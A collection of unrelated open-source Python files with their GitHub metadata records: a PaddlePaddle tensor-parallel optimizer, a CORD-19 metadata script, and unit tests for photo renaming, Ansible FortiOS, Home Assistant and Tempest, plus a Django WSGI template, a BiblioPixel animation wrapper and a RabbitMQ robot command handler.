is_loss_grad_op,
is_optimizer_op,
)
__all__ = []
class TensorParallelOptimizer(MetaOptimizerBase):
def __init__(self, optimizer):
super().__init__(optimizer)
self.inner_opt = optimizer
self.meta_optimizers_white_list = [
"RecomputeOptimizer",
"AMPOptimizer",
"LarsOptimizer",
"LambOptimizer",
]
self.meta_optimizers_black_list = [
"GraphExecutionOptimizer",
]
self.mp_ring_id = 0
self.global_ring_id = 1
self.dp_ring_id = 2
def _set_basic_info(
self, loss, role_maker, user_defined_optimizer, user_defined_strategy
):
super()._set_basic_info(
loss, role_maker, user_defined_optimizer, user_defined_strategy
)
self.mp_degree = user_defined_strategy.tensor_parallel_configs[
'tensor_parallel_degree'
]
def _can_apply(self):
if not self.role_maker._is_collective:
return False
if self.user_defined_strategy.tensor_parallel:
return True
return False
def _disable_strategy(self, dist_strategy):
dist_strategy.tensor_parallel = False
dist_strategy.tensor_parallel_configs = {}
def _enable_strategy(self, dist_strategy, context):
dist_strategy.tensor_parallel = True
dist_strategy.tensor_parallel_configs = {
"tensor_parallel_degree": 1,
}
def _broadcast_params(self, ring_id, mp_mode):
block = self.startup_program.global_block()
param = None
for param in block.iter_parameters():
if param.is_distributed and mp_mode:
continue
block.append_op(
type='c_broadcast',
inputs={'X': param},
outputs={'Out': param},
attrs={
'ring_id': ring_id,
'root': 0,
OP_ROLE_KEY: OpRole.Forward,
},
)
if not param:
return # no parameter on this device
block.append_op(
type='c_sync_comm_stream',
inputs={'X': param},
outputs={'Out': param},
attrs={'ring_id': ring_id, OP_ROLE_KEY: OpRole.Forward},
)
def _get_process_group_info(self):
# global ring info
self.global_endpoints = self.endpoints
self.global_rank = self.rank
self.global_nranks = self.nranks
# model parallel ring info
self.mp_rank = self.rank % self.mp_degree
self.mp_nranks = self.mp_degree
mp_group = self.rank // self.mp_degree
self.mp_endpoints = [
self.endpoints[i]
for i in range(self.global_nranks)
if i // self.mp_degree == mp_group
]
# data parallel ring info
if self.nranks > self.mp_degree:
self.dp_rank = self.rank // self.mp_degree
self.dp_nranks = self.nranks // self.mp_degree
start_index = self.rank % self.mp_degree
self.dp_endpoints = [
self.endpoints[start_index + i * self.mp_degree]
for i in range(self.dp_nranks)
]
def _init_process_group(self):
self._get_process_group_info()
collective_helper = CollectiveHelper(self.role_maker, wait_port=False)
# Create global ring for all gpus
collective_helper._init_communicator(
self.startup_program,
self.current_endpoint,
self.global_endpoints,
self.global_rank,
self.global_ring_id,
True,
self.global_ring_id,
True,
)
# Create model parallel ring for all gpus
collective_helper._init_communicator(
self.startup_program,
self.current_endpoint,
self.mp_endpoints,
self.mp_rank,
self.mp_ring_id,
True,
self.global_ring_id,
True,
)
self._broadcast_params(self.mp_ring_id, mp_mode=True)
# Create dp rings
if self.nranks > self.mp_degree:
collective_helper._init_communicator(
self.startup_program,
self.current_endpoint,
self.dp_endpoints,
self.dp_rank,
self.dp_ring_id,
True,
self.global_ring_id,
True,
)
self._broadcast_params(self.dp_ring_id, mp_mode=False)
def minimize_impl(
self, loss, startup_program=None, parameter_list=None, no_grad_set=None
):
self.endpoints = self.role_maker._get_trainer_endpoints()
self.current_endpoint = self.endpoints[self.role_maker._worker_index()]
self.startup_program = startup_program
if startup_program is None:
self.startup_program = static.default_startup_program()
optimize_ops, params_grads = self.inner_opt.minimize(
loss, self.startup_program, parameter_list, no_grad_set
)
self.main_program = loss.block.program
self.nranks = len(self.endpoints)
self.rank = self.role_maker._worker_index()
self._init_process_group()
assert self.nranks % self.mp_degree == 0
if self.nranks > self.mp_degree:
# data parallelism
dp_degree = self.nranks // self.mp_degree
self._transpile_main_program(loss, dp_degree)
return optimize_ops, params_grads
def _transpile_main_program(self, loss, dp_degree):
self._insert_loss_grad_ops(loss, dp_degree)
self._insert_allreduce_ops(loss, self.dp_ring_id)
def _insert_loss_grad_ops(self, loss, dp_degree):
"""
In order to keep the learning rate consistent in different numbers of
training workers, we scale the loss grad by the number of workers
"""
block = loss.block
for idx, op in reversed(list(enumerate(block.ops))):
if is_loss_grad_op(op):
loss_grad_var = block.vars[op.output_arg_names[0]]
block._insert_op(
idx + 1,
type='scale',
inputs={'X': loss_grad_var},
outputs={'Out': loss_grad_var},
attrs={
'scale': 1.0 / dp_degree,
OP_ROLE_KEY: OpRole.Backward,
},
)
break
def _insert_allreduce_ops(self, loss, ring_id):
block = loss.block
grad = None
for idx, op in reversed(list(enumerate(block.ops))):
if is_backward_op(op) and OP_ROLE_VAR_KEY in op.attr_names:
op_role_var = op.attr(OP_ROLE_VAR_KEY)
if len(op_role_var) == 0:
continue
assert len(op_role_var) % 2 == 0
offset = idx
for i in range(0, len(op_role_var), 2):
param = block.vars[op_role_var[i]]
grad = block.vars[op_role_var[i + 1]]
if offset == idx:
offset += 1
block._insert_op(
offset,
type='c_sync_calc_stream',
inputs={'X': grad},
outputs={'Out': grad},
attrs={OP_ROLE_KEY: OpRole.Backward},
)
offset += 1
block._insert_op(
offset,
type='c_allreduce_sum',
inputs={'X': grad},
outputs={'Out': grad},
attrs={
'ring_id': ring_id,
OP_ROLE_KEY: OpRole.Backward,
},
)
if grad is None:
return
for idx, op in list(enumerate(block.ops)):
if is_optimizer_op(op):
block._insert_op(
idx,
type='c_sync_comm_stream',
inputs={'X': grad},
outputs={'Out': grad},
attrs={'ring_id': ring_id, OP_ROLE_KEY: OpRole.Backward},
)
break
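# Illustrative sketch (an addition, not part of the optimizer): how trainer
# ranks map onto the model-parallel and data-parallel rings computed in
# _get_process_group_info, and why _insert_loss_grad_ops scales by
# 1 / dp_degree.  The trainer names and degrees used below are made up.
def _example_ring_layout(nranks=8, mp_degree=2):
    endpoints = ['trainer%d' % i for i in range(nranks)]
    layout = []
    for rank in range(nranks):
        # same arithmetic as _get_process_group_info
        mp_group = rank // mp_degree
        mp_peers = [
            endpoints[i]
            for i in range(nranks)
            if i // mp_degree == mp_group
        ]
        start_index = rank % mp_degree
        dp_peers = [
            endpoints[start_index + i * mp_degree]
            for i in range(nranks // mp_degree)
        ]
        layout.append((endpoints[rank], mp_peers, dp_peers))
    return layout
# With dp_degree = nranks // mp_degree workers summing gradients through
# c_allreduce_sum, scaling each local loss gradient by 1.0 / dp_degree turns
# the summed gradient into an average, so the learning rate does not have to
# be retuned when the number of data-parallel workers changes.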
| {
"content_hash": "03666e5c211379fd48152ef3e12bf752",
"timestamp": "",
"source": "github",
"line_count": 256,
"max_line_length": 79,
"avg_line_length": 33.77734375,
"alnum_prop": 0.5039898230600208,
"repo_name": "PaddlePaddle/Paddle",
"id": "41ef5f6190ebf9d36616e55132110355137c046b",
"size": "9227",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "python/paddle/distributed/fleet/meta_optimizers/tensor_parallel_optimizer.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "58544"
},
{
"name": "C",
"bytes": "210300"
},
{
"name": "C++",
"bytes": "36848680"
},
{
"name": "CMake",
"bytes": "902619"
},
{
"name": "Cuda",
"bytes": "5227207"
},
{
"name": "Dockerfile",
"bytes": "4361"
},
{
"name": "Go",
"bytes": "49796"
},
{
"name": "Java",
"bytes": "16630"
},
{
"name": "Jinja",
"bytes": "23852"
},
{
"name": "MLIR",
"bytes": "39982"
},
{
"name": "Python",
"bytes": "36203874"
},
{
"name": "R",
"bytes": "1332"
},
{
"name": "Shell",
"bytes": "553177"
}
],
"symlink_target": ""
} |
import pandas as pd
from itertools import islice
import pickle
import re
from time import time
t0 = time()
df = pd.read_csv('metadata.csv')
print('columns',list(df))
selected = df[['cord_uid','sha','publish_time','journal','url','title']].where(df['sha'].notna())
meta_by_sha = {}
rows = selected.iterrows()
for _,r in rows:
if type(r['cord_uid']) is float: continue # NaN
for sha in r['sha'].split(';'):
sha = sha.strip()
if not re.match('^[a-f0-9]+$',sha):
print(r)
exit()
meta = {k:r[k] for k in ['cord_uid','publish_time','journal','title']}
meta_by_sha[sha] = meta
pickle.dump(meta_by_sha,open('paper_meta_by_sha.pkl','wb'))
print(f"done in {time()-t0:.01f} seconds")
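# A hedged addition, not in the original script: reading the pickle back and
# looking up one sha to show the shape of the stored mapping.  The default
# sha below is a placeholder, not a real hash from the dataset.
def example_lookup(sha='0' * 40, path='paper_meta_by_sha.pkl'):
    with open(path, 'rb') as f:
        meta = pickle.load(f)
    # returns {'cord_uid': ..., 'publish_time': ..., 'journal': ..., 'title': ...}
    # for a known sha, or None otherwise
    return meta.get(sha)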
| {
"content_hash": "0e8bf0168b06c88db1b3cf1d7cdacf69",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 97,
"avg_line_length": 26.692307692307693,
"alnum_prop": 0.638328530259366,
"repo_name": "mobarski/sandbox",
"id": "ef9fdddd93593ac9d4aae92fcc03acdebf268a50",
"size": "694",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "covid19/data/test_meta.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "862"
},
{
"name": "CSS",
"bytes": "6757"
},
{
"name": "Go",
"bytes": "2645"
},
{
"name": "HTML",
"bytes": "637936"
},
{
"name": "JavaScript",
"bytes": "23025"
},
{
"name": "Jupyter Notebook",
"bytes": "57502"
},
{
"name": "Lua",
"bytes": "549110"
},
{
"name": "Makefile",
"bytes": "580"
},
{
"name": "Python",
"bytes": "1329224"
},
{
"name": "Roff",
"bytes": "561"
}
],
"symlink_target": ""
} |
import ntpath
import sys
from unittest import TestCase
from exifread import IfdTag
from mock import mock
from pictures.rename import rename
from tests import helpers
def ifd_tag_from(date_time_original):
return IfdTag(None, None, None, date_time_original, None, None)
class MockFile(object):
def __init__(self, filename, mode):
self.filename = filename
self.mode = mode
def __enter__(self):
return self
def __exit__(self, *args):
pass
def create_mock_process_file(files):
return lambda f_mock: files[f_mock.filename]
def create_mock_isfile(files):
return lambda f: f in files
class TestRename(TestCase):
FILES = {
r'C:\dir\no_exif_tags.jpeg': {},
r'C:\dir\timestamp_does_not_exist.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2016:10:29 15:43:56')}, # 1 check
r'C:\dir\timestamp_does_exist.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2016:02:04 12:03:35')}, # 2 checks
r'C:\dir\20160204_120335.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2016:02:04 12:03:35')},
r'C:\dir\timestamp_does_exist_multiple.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')}, # 4 checks
r'C:\dir\20170103_142345.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')},
r'C:\dir\20170103_142345_1.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')},
r'C:\dir\20170103_142345_2.jpeg': {'EXIF DateTimeOriginal': ifd_tag_from('2017:01:03 14:23:45')}
}
@mock.patch('os.rename')
@mock.patch('exifread.process_file', side_effect=create_mock_process_file(FILES))
@mock.patch('builtins.open' if sys.version_info[0] >= 3 else '__builtin__.open', side_effect=MockFile)
@mock.patch('os.path.isfile', create_mock_isfile(FILES))
@mock.patch('os.path', ntpath)
def test_rename(self, mock_open, mock_process_file, mock_rename):
rename(self.FILES)
self.assertEquals(mock_open.mock_calls, helpers.calls_from(zip(self.FILES.keys(), ['rb'] * len(self.FILES))))
self.assertEquals(mock_process_file.call_count, len(self.FILES))
self.assertEquals(sorted(mock_rename.mock_calls), sorted(helpers.calls_from([
(r'C:\dir\timestamp_does_not_exist.jpeg', r'C:\dir\20161029_154356.jpeg'),
(r'C:\dir\timestamp_does_exist.jpeg', r'C:\dir\20160204_120335_1.jpeg'),
(r'C:\dir\timestamp_does_exist_multiple.jpeg', r'C:\dir\20170103_142345_3.jpeg')
])))
| {
"content_hash": "efa2fc4b9447b9b175f0111a5f7b7cd6",
"timestamp": "",
"source": "github",
"line_count": 65,
"max_line_length": 129,
"avg_line_length": 38.52307692307692,
"alnum_prop": 0.6553514376996805,
"repo_name": "mina-asham/pictures-dedupe-and-rename",
"id": "fe6295126fdb425934c20d5aaf75706fdea94858",
"size": "2504",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_rename.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "9416"
}
],
"symlink_target": ""
} |
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_user_device_group
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_user_device_group.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_user_device_group_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_device_group_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_device_group_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'device-group', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_user_device_group_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
delete_method_mock.assert_called_with('user', 'device-group', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_user_device_group_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_user_device_group_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'user_device_group': {
'random_attribute_not_valid': 'tag',
'comment': 'Comment.',
'name': 'default_name_4',
},
'vdom': 'root'}
is_error, changed, response = fortios_user_device_group.fortios_user(input_data, fos_instance)
expected_data = {
'comment': 'Comment.',
'name': 'default_name_4',
}
set_method_mock.assert_called_with('user', 'device-group', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
| {
"content_hash": "65c589f78cf64cc46338af3fc10d3078",
"timestamp": "",
"source": "github",
"line_count": 203,
"max_line_length": 142,
"avg_line_length": 34.02463054187192,
"alnum_prop": 0.6525264224699581,
"repo_name": "thaim/ansible",
"id": "c5f79f6c4c98633e5472e6f21dead9a8f0399c97",
"size": "7603",
"binary": false,
"copies": "20",
"ref": "refs/heads/fix-broken-link",
"path": "test/units/modules/network/fortios/test_fortios_user_device_group.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7"
},
{
"name": "Shell",
"bytes": "246"
}
],
"symlink_target": ""
} |
"""Tests for Kaleidescape config flow."""
import dataclasses
from unittest.mock import AsyncMock
from homeassistant.components.kaleidescape.const import DOMAIN
from homeassistant.config_entries import SOURCE_SSDP, SOURCE_USER
from homeassistant.const import CONF_HOST
from homeassistant.core import HomeAssistant
from homeassistant.data_entry_flow import FlowResultType
from . import MOCK_HOST, MOCK_SSDP_DISCOVERY_INFO
from tests.common import MockConfigEntry
async def test_user_config_flow_success(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test user config flow success."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "user"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={CONF_HOST: MOCK_HOST}
)
await hass.async_block_till_done()
assert result["type"] == FlowResultType.CREATE_ENTRY
assert "data" in result
assert result["data"][CONF_HOST] == MOCK_HOST
async def test_user_config_flow_bad_connect_errors(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test errors when connection error occurs."""
mock_device.connect.side_effect = ConnectionError
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data={CONF_HOST: MOCK_HOST}
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "user"
assert result["errors"] == {"base": "cannot_connect"}
async def test_user_config_flow_unsupported_device_errors(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test errors when connecting to unsupported device."""
mock_device.is_server_only = True
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data={CONF_HOST: MOCK_HOST}
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "user"
assert result["errors"] == {"base": "unsupported"}
async def test_user_config_flow_device_exists_abort(
hass: HomeAssistant, mock_device: AsyncMock, mock_integration: MockConfigEntry
) -> None:
"""Test flow aborts when device already configured."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}, data={CONF_HOST: MOCK_HOST}
)
assert result["type"] == FlowResultType.ABORT
assert result["reason"] == "already_configured"
async def test_ssdp_config_flow_success(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test ssdp config flow success."""
discovery_info = dataclasses.replace(MOCK_SSDP_DISCOVERY_INFO)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_SSDP}, data=discovery_info
)
assert result["type"] == FlowResultType.FORM
assert result["step_id"] == "discovery_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"], user_input={}
)
await hass.async_block_till_done()
assert result["type"] == FlowResultType.CREATE_ENTRY
assert "data" in result
assert result["data"][CONF_HOST] == MOCK_HOST
async def test_ssdp_config_flow_bad_connect_aborts(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test abort when connection error occurs."""
mock_device.connect.side_effect = ConnectionError
discovery_info = dataclasses.replace(MOCK_SSDP_DISCOVERY_INFO)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_SSDP}, data=discovery_info
)
assert result["type"] == FlowResultType.ABORT
assert result["reason"] == "cannot_connect"
async def test_ssdp_config_flow_unsupported_device_aborts(
hass: HomeAssistant, mock_device: AsyncMock
) -> None:
"""Test abort when connecting to unsupported device."""
mock_device.is_server_only = True
discovery_info = dataclasses.replace(MOCK_SSDP_DISCOVERY_INFO)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_SSDP}, data=discovery_info
)
assert result["type"] == FlowResultType.ABORT
assert result["reason"] == "unsupported"
| {
"content_hash": "9de7319e2de7d256f5f4d2a3616045f1",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 82,
"avg_line_length": 34.30952380952381,
"alnum_prop": 0.6985889428637521,
"repo_name": "w1ll1am23/home-assistant",
"id": "8171ed0955bb47a829fdd227153fe2db48fc75cd",
"size": "4323",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/kaleidescape/test_config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2963"
},
{
"name": "PLSQL",
"bytes": "840"
},
{
"name": "Python",
"bytes": "52277012"
},
{
"name": "Shell",
"bytes": "6252"
}
],
"symlink_target": ""
} |
import copy
from . wrapper import Wrapper
from .. util import color_list
class Feedback(Wrapper):
def __init__(self, *args, animation,
master=1, inputs=None, outputs=None, **kwds):
super().__init__(*args, animation=animation, **kwds)
self.master = master
inputs = inputs or [0]
outputs = outputs or []
in_sources = [copy.deepcopy(self.color_list) for i in inputs[1:]]
        # list.insert() needs an index; the wrapped animation's output is the
        # first input source, corresponding to inputs[0].
        in_sources.insert(0, self.animation.color_list)
out_sources = [copy.deepcopy(self.color_list) for i in outputs]
self.inputs = color_list.Mixer(self.color_list, in_sources, inputs)
self.outputs = color_list.Mixer(self.color_list, out_sources, outputs)
self.clear = self.inputs.clear
self.math = self.inputs.math
def step(self, amt=1):
super().step(amt=amt)
self.clear()
self.inputs.mix(self.master)
self.outputs.mix(self.master)
        def rotate(sources, begin):
            # Rotate the delayed source buffers by one frame, leaving the
            # first `begin` entries in place.
            if len(sources) > 1 + begin:
                sources.insert(begin, sources.pop())
ins, outs = self.inputs.sources, self.outputs.sources
rotate(ins, 1)
rotate(outs, 0)
if len(ins) > 1:
self.math.copy(ins[1], ins[0])
if len(outs) > 0:
self.math.copy(outs[0], self.color_list)
| {
"content_hash": "ca2e87a46660a952a661d86d9aa1b7b1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 78,
"avg_line_length": 29.08695652173913,
"alnum_prop": 0.5866965620328849,
"repo_name": "rec/BiblioPixel",
"id": "d78a71ef5fd1d9f16be29a9d9868726b46cda8f5",
"size": "1338",
"binary": false,
"copies": "2",
"ref": "refs/heads/dev",
"path": "bibliopixel/animation/feedback.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "20651"
},
{
"name": "HTML",
"bytes": "3310"
},
{
"name": "JavaScript",
"bytes": "5140"
},
{
"name": "Python",
"bytes": "673520"
},
{
"name": "Shell",
"bytes": "2973"
}
],
"symlink_target": ""
} |
"""
WSGI config for {{ project_name }} project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/{{ docs_version }}/howto/deployment/wsgi/
"""
from __future__ import absolute_import, unicode_literals
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "{{ project_name }}.settings.dev")
application = get_wsgi_application()
| {
"content_hash": "82be1ebd3861d6689feab0b85eed4697",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 82,
"avg_line_length": 27.22222222222222,
"alnum_prop": 0.746938775510204,
"repo_name": "nilnvoid/wagtail",
"id": "f58f6b154cd83f53b14b37d743094191dec4e768",
"size": "490",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "wagtail/project_template/project_name/wsgi.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "172932"
},
{
"name": "HTML",
"bytes": "291232"
},
{
"name": "JavaScript",
"bytes": "116614"
},
{
"name": "Makefile",
"bytes": "548"
},
{
"name": "Python",
"bytes": "2253627"
},
{
"name": "Shell",
"bytes": "7387"
}
],
"symlink_target": ""
} |
from tempest.api.network import base
from tempest import test
class DHCPAgentSchedulersTestJSON(base.BaseAdminNetworkTest):
_interface = 'json'
@classmethod
@test.safe_setup
def setUpClass(cls):
super(DHCPAgentSchedulersTestJSON, cls).setUpClass()
if not test.is_extension_enabled('dhcp_agent_scheduler', 'network'):
msg = "dhcp_agent_scheduler extension not enabled."
raise cls.skipException(msg)
# Create a network and make sure it will be hosted by a
# dhcp agent: this is done by creating a regular port
cls.network = cls.create_network()
cls.subnet = cls.create_subnet(cls.network)
cls.cidr = cls.subnet['cidr']
cls.port = cls.create_port(cls.network)
@test.attr(type='smoke')
def test_list_dhcp_agent_hosting_network(self):
_, body = self.admin_client.list_dhcp_agent_hosting_network(
self.network['id'])
@test.attr(type='smoke')
def test_list_networks_hosted_by_one_dhcp(self):
resp, body = self.admin_client.list_dhcp_agent_hosting_network(
self.network['id'])
agents = body['agents']
self.assertIsNotNone(agents)
agent = agents[0]
self.assertTrue(self._check_network_in_dhcp_agent(
self.network['id'], agent))
def _check_network_in_dhcp_agent(self, network_id, agent):
network_ids = []
_, body = self.admin_client.list_networks_hosted_by_one_dhcp_agent(
agent['id'])
networks = body['networks']
for network in networks:
network_ids.append(network['id'])
return network_id in network_ids
@test.attr(type='smoke')
def test_add_remove_network_from_dhcp_agent(self):
# The agent is now bound to the network, we can free the port
self.client.delete_port(self.port['id'])
self.ports.remove(self.port)
agent = dict()
agent['agent_type'] = None
resp, body = self.admin_client.list_agents()
agents = body['agents']
for a in agents:
if a['agent_type'] == 'DHCP agent':
agent = a
break
self.assertEqual(agent['agent_type'], 'DHCP agent', 'Could not find '
'DHCP agent in agent list though dhcp_agent_scheduler'
' is enabled.')
network = self.create_network()
network_id = network['id']
if self._check_network_in_dhcp_agent(network_id, agent):
self._remove_network_from_dhcp_agent(network_id, agent)
self._add_dhcp_agent_to_network(network_id, agent)
else:
self._add_dhcp_agent_to_network(network_id, agent)
self._remove_network_from_dhcp_agent(network_id, agent)
def _remove_network_from_dhcp_agent(self, network_id, agent):
_, body = self.admin_client.remove_network_from_dhcp_agent(
agent_id=agent['id'],
network_id=network_id)
self.assertFalse(self._check_network_in_dhcp_agent(
network_id, agent))
def _add_dhcp_agent_to_network(self, network_id, agent):
_, body = self.admin_client.add_dhcp_agent_to_network(agent['id'],
network_id)
self.assertTrue(self._check_network_in_dhcp_agent(
network_id, agent))
class DHCPAgentSchedulersTestXML(DHCPAgentSchedulersTestJSON):
_interface = 'xml'
| {
"content_hash": "0304044a7fbda7546fde02c01ec6f2c8",
"timestamp": "",
"source": "github",
"line_count": 86,
"max_line_length": 79,
"avg_line_length": 40.46511627906977,
"alnum_prop": 0.603448275862069,
"repo_name": "cloudbase/lis-tempest",
"id": "c84d1a7c36f73ed78d1b5dd674df3ede1312e199",
"size": "4082",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tempest/api/network/admin/test_dhcp_agent_scheduler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3377111"
},
{
"name": "Shell",
"bytes": "8663"
}
],
"symlink_target": ""
} |
__author__ = 'Ahmad Syarif'
import pika
import json
class CommandHandler(object):
avatarKey = 'avatar.NAO.command'
def __init__(self):
credential = pika.PlainCredentials('lumen', 'lumen')
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost', 5672, '/', credential))
self.channel = connection.channel()
pass
def sendCommand(self,command):
self.channel.basic_publish(exchange='amq.topic',routing_key=CommandHandler.avatarKey,body=command)
pass
def LS_say(self,toSay):
par = json.dumps({'text':toSay})
com = json.dumps({'type':'texttospeech','method':'say','parameter':{'text':toSay}})
self.sendCommand(command=com)
pass
def LS_goToPosture(self,posture,speed):
com = json.dumps({'type':'posture','method':'goToPosture','parameter':{'postureName':posture,'speed':speed}})
self.sendCommand(command=com)
pass
def LS_wakeUp(self):
com = json.dumps({'type':'motion','method':'wakeUp'})
self.sendCommand(command=com)
pass
def LS_rest(self):
com = json.dumps({'type':'motion','method':'rest'})
self.sendCommand(command=com)
pass
pass
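# Hedged usage sketch, not part of the original module: exercising the handler
# against the local RabbitMQ broker it connects to in __init__ (credentials
# 'lumen'/'lumen', topic 'avatar.NAO.command').  The posture name and spoken
# text below are example values.
if __name__ == '__main__':
    handler = CommandHandler()
    handler.LS_wakeUp()
    handler.LS_say('Hello from the agent')
    handler.LS_goToPosture('Stand', 0.5)
    handler.LS_rest()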
| {
"content_hash": "bc1185d9d7dbacf1bf2d8df4bbecd0c6",
"timestamp": "",
